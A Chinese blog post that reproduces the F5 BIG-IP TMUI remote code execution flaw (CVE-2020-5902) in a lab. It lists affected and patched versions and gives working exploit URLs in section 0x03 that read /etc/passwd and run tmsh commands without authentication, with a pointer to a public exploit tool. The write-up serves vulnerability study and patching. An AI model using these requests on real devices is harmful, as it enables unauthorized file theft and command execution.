java 代码执行 export命令_F5 BIGIP 远程代码执行漏洞复现

0x00 漏洞介绍

F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2020年7月1日,F5官方公布流量管理用户界面(TMUI)存在 前台远程执行代码(RCE)漏洞(CVE-2020-5902)。攻击者利用该漏洞,构造恶意请求,在未授权的情况下获得目标服务器的权限,实现远程代码执行。

未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。

0x01 漏洞范围

BIG-IP 15.x: 15.1.0/15.0.0

BIG-IP 14.x: 14.1.0 ~ 14.1.2

BIG-IP 13.x: 13.1.0 ~ 13.1.3

BIG-IP 12.x: 12.1.0 ~ 12.1.5

BIG-IP 11.x: 11.6.1 ~ 11.6.5

0x02 漏洞靶场

靶机:BIGIP-14.1.2-0.0.37  192.168.1.45

攻击机:Kali x64 192.168.1.33

在登录页面注册,之后申请秘钥:https://www.f5.com.cn/trials/big-ip-virtual-edition

打开下载页面:https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v14.x&ver=14.1.2

选择版本,下载BIGIP-14.1.2-0.0.37.ALL-scsi.ova

b1adde2f4525b27e8fcacb494655e290.png

使用vmware-workstation软件运行镜像文件

a581941ab48cf91109b95f83e079064d.png

使用密码root/default登陆系统,第一次需要重置root密码

67836fd6ccbd7fefda394b52f7a69281.png

配置网卡信息,输入config

f7e004f7e4fababc541f99dec05fe0ce.png

这设置自动获取IP地址,使用同一网段ping 192.168.1.45

a286075f455106fedee5251375eea163.png

使用浏览器访问https://192.168.1.45,使用用户名为root,口令为服务器登陆口令

2f68dbdc124aa6039c09870b5797bdbc.png

重置密码,使用新的密码登陆后台

aef7128a9e665de95efa7a846d3c5359.png

0x03 漏洞利用

A.任意文件读物

exp:

https://ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

https://192.168.1.45/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

34527c302d1feb10ee6cc55a840ecc71.png

B.命令执行

exp:

https://ip/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

使用github工具执行命令

https://github.com/jas502n/CVE-2020-5902

fb3618d3b56600ff9b9ad79beae48fcf.png

将目标地址修改到代码

7851888c534a16d6b999dd28af69461e.png

运行exp

256c50875dd827458075de4f6a846ba6.png

成功执行命令

0x04 漏洞修复

通用修补建议:

升级到以下版本

BIG-IP 15.x: 15.1.0.4

BIG-IP 14.x: 14.1.2.6

BIG-IP 13.x: 13.1.3.4

BIG-IP 12.x: 12.1.5.2

BIG-IP 11.x: 11.6.5.2

漏洞参考:

https://github.com/jas502n/CVE-2020-5902

https://support.f5.com/csp/article/K52145254

最后,附上一张他人msf下成功被攻击界面

6fd74061af95ed88ae4e29d91b608b34.png

经过验证msf下CVE-2020-5902漏洞利用模块暂不稳定!!!

b703af0d28ccddf329a60a0d094365fb.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值